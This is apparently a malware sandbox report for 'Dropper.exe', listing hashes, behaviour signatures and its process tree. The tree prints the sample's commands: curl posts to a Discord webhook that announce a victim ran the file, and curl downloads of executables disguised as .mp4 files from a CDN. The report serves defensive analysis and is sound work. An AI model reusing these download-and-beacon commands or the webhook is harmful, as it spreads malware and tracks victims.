5ab63870b80c8c0b2fb482f1c9581682740feac9ae7a5c0d8fd9b31997865330

Analysis

max time kernel
134s
max time network
136s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
14-07-2024 23:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dropper.exe
Size

12KB
MD5

3c7266e1f13c9dd74dba9b7546601d01
SHA1

71434fc2a94fd910820f6b8d7d9440a5c45b7ae0
SHA256

5ab63870b80c8c0b2fb482f1c9581682740feac9ae7a5c0d8fd9b31997865330
SHA512

3b71e65c0d815b6444c6f908af0015491147438977bcb795b318a07b3b78e1c4491cf21265b90c742fb5615a900256bb2e03cf2074993cec07f46dcd6ae111b2
SSDEEP

384:t/kXUT2i7q9bJnz6PbQ4+FBCf3tmfhhD84VCsk:n2n9bJMbIytkhhDJwsk

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 4904 wrote to memory of 788	4904	Dropper.exe	73
PID 4904 wrote to memory of 788	4904	Dropper.exe	73
PID 4904 wrote to memory of 788	4904	Dropper.exe	73
PID 788 wrote to memory of 2148	788	Dropper.exe	75
PID 788 wrote to memory of 2148	788	Dropper.exe	75
PID 788 wrote to memory of 2148	788	Dropper.exe	75
PID 788 wrote to memory of 2068	788	Dropper.exe	77
PID 788 wrote to memory of 2068	788	Dropper.exe	77
PID 788 wrote to memory of 2068	788	Dropper.exe	77
PID 788 wrote to memory of 5012	788	Dropper.exe	79
PID 788 wrote to memory of 5012	788	Dropper.exe	79
PID 788 wrote to memory of 5012	788	Dropper.exe	79
PID 788 wrote to memory of 4496	788	Dropper.exe	81
PID 788 wrote to memory of 4496	788	Dropper.exe	81
PID 788 wrote to memory of 4496	788	Dropper.exe	81
PID 788 wrote to memory of 3884	788	Dropper.exe	83
PID 788 wrote to memory of 3884	788	Dropper.exe	83
PID 788 wrote to memory of 3884	788	Dropper.exe	83
PID 788 wrote to memory of 1652	788	Dropper.exe	85
PID 788 wrote to memory of 1652	788	Dropper.exe	85
PID 788 wrote to memory of 1652	788	Dropper.exe	85
PID 1132 wrote to memory of 1544	1132	Dropper.exe	93
PID 1132 wrote to memory of 1544	1132	Dropper.exe	93
PID 1132 wrote to memory of 1544	1132	Dropper.exe	93
PID 1544 wrote to memory of 656	1544	Dropper.exe	95
PID 1544 wrote to memory of 656	1544	Dropper.exe	95
PID 1544 wrote to memory of 656	1544	Dropper.exe	95
PID 1544 wrote to memory of 4936	1544	Dropper.exe	97
PID 1544 wrote to memory of 4936	1544	Dropper.exe	97
PID 1544 wrote to memory of 4936	1544	Dropper.exe	97
PID 1544 wrote to memory of 3132	1544	Dropper.exe	99
PID 1544 wrote to memory of 3132	1544	Dropper.exe	99
PID 1544 wrote to memory of 3132	1544	Dropper.exe	99
PID 1544 wrote to memory of 3576	1544	Dropper.exe	101
PID 1544 wrote to memory of 3576	1544	Dropper.exe	101
PID 1544 wrote to memory of 3576	1544	Dropper.exe	101
PID 1544 wrote to memory of 3808	1544	Dropper.exe	103
PID 1544 wrote to memory of 3808	1544	Dropper.exe	103
PID 1544 wrote to memory of 3808	1544	Dropper.exe	103
PID 1544 wrote to memory of 3896	1544	Dropper.exe	105
PID 1544 wrote to memory of 3896	1544	Dropper.exe	105
PID 1544 wrote to memory of 3896	1544	Dropper.exe	105

C:\Users\Admin\AppData\Local\Temp\Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4904
- C:\Users\Admin\AppData\Local\Temp\Dropper.exe
  "C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:788
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-slchost.exe
    3⤵
    PID:5012
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware-cumedition.mp4?v=1720951482591 --output C:\Users\Admin\AppData\Local\Temp\$77-cumware.exe
    3⤵
    PID:4496
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-inst.exe
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-adchost.exe, $77-slchost.exe, $77-cumware.exe, and $77-inst.exe` Was Just On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    3⤵
    PID:1652

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:200

C:\Users\Admin\AppData\Local\Temp\Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1132
- C:\Users\Admin\AppData\Local\Temp\Dropper.exe
  "C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    3⤵
    PID:656
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-slchost.exe
    3⤵
    PID:3132
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware-cumedition.mp4?v=1720951482591 --output C:\Users\Admin\AppData\Local\Temp\$77-cumware.exe
    3⤵
    PID:3576
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-inst.exe
    3⤵
    PID:3808
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-adchost.exe, $77-slchost.exe, $77-cumware.exe, and $77-inst.exe` Was Just On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    3⤵
    PID:3896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dropper.exe.log

Filesize
425B

MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
memory/788-4-0x0000000073340000-0x0000000073435000-memory.dmp

Filesize
980KB

Download
memory/788-5-0x0000000073340000-0x0000000073435000-memory.dmp

Filesize
980KB

Download
memory/4904-0-0x00000000733AE000-0x00000000733AF000-memory.dmp

Filesize
4KB

Download
memory/4904-1-0x0000000000FF0000-0x0000000000FFA000-memory.dmp

Filesize
40KB

Download